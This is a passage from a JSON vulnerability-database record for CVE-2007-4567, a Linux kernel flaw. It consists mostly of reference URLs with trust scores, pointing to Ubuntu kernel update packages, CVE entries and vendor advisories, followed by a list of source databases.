        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-powerpc_2.6.22-14.51_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-server_2.6.22-14.51_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.43_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.43_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-386_2.6.17.1-12.43_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.43_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-virtual_2.6.22-14.51_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc_2.6.17.1-12.43_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.43_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.43_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64-smp_2.6.20-16.34_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-14.51.diff.gz"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.34_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc_2.6.17.1-12.43_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-sparc64_2.6.22-14.51_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-generic_2.6.22-14.51_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server-bigiron_2.6.20-16.34_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.34_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-cell_2.6.22-14.51_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-14-ume_2.6.22-14.51_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-kernel-devel_2.6.20-16.34_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/advisories/25505/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/20.html"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=e76b2b2567b83448c2ee85a896433b96150c92e6"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.exploit-db.com/exploits/30902/"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=14808"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4133"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/bugs/164231)"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/23034/"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-558-1"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/28170/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5966"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-6206"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3107"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-6417"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-6151"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0001"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-6063"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1386"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3547"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3286"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3080"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0001"
      },
      {
        "trust": 0.1,
        "url": "http://bit.ly/aqtcqn"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2908"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1013127"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1377"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4536"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2409"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4536"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3620"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/security"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3228"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4021"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1387"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0427"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0426"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1055"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3621"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2006-6304"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3939"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4020"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3736"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2695"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3556"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1378"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4538"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3621"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0097"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4537"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/security_response.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0290"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3547"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3286"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3612"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3613"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4138"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4272"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0382"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1384"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2695"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4355"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4141"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/eos.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2908"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3613"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0590"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4538"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3620"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3080"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3726"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-6304"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2910"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3556"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3612"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1379"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4212"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4537"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3889"
      },
      {
        "trust": 0.1,
        "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2910"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/eos_vi.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3563"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3228"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3726"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://rhn.redhat.com"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/38015/"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0019.html"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/28706/"
      },
      {
        "trust": 0.1,
        "url": "https://lists.ubuntu.com/archives/ubuntu-security-announce/2008-february/000661.html"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/28105/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/27908/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/28654/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/27842/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/25955/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/28485/"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27929"
      },
      {
        "db": "VULMON",
        "id": "CVE-2007-4567"
      },
      {
        "db": "BID",
        "id": "26943"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001202"
      },
      {
        "db": "PACKETSTORM",
        "id": "61952"
      },
      {
        "db": "PACKETSTORM",
        "id": "61991"
      },
      {
        "db": "PACKETSTORM",
        "id": "63233"
      },
      {
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "db": "PACKETSTORM",
        "id": "85224"
      },
      {
        "db": "PACKETSTORM",
        "id": "63291"
      },
      {
        "db": "NVD",
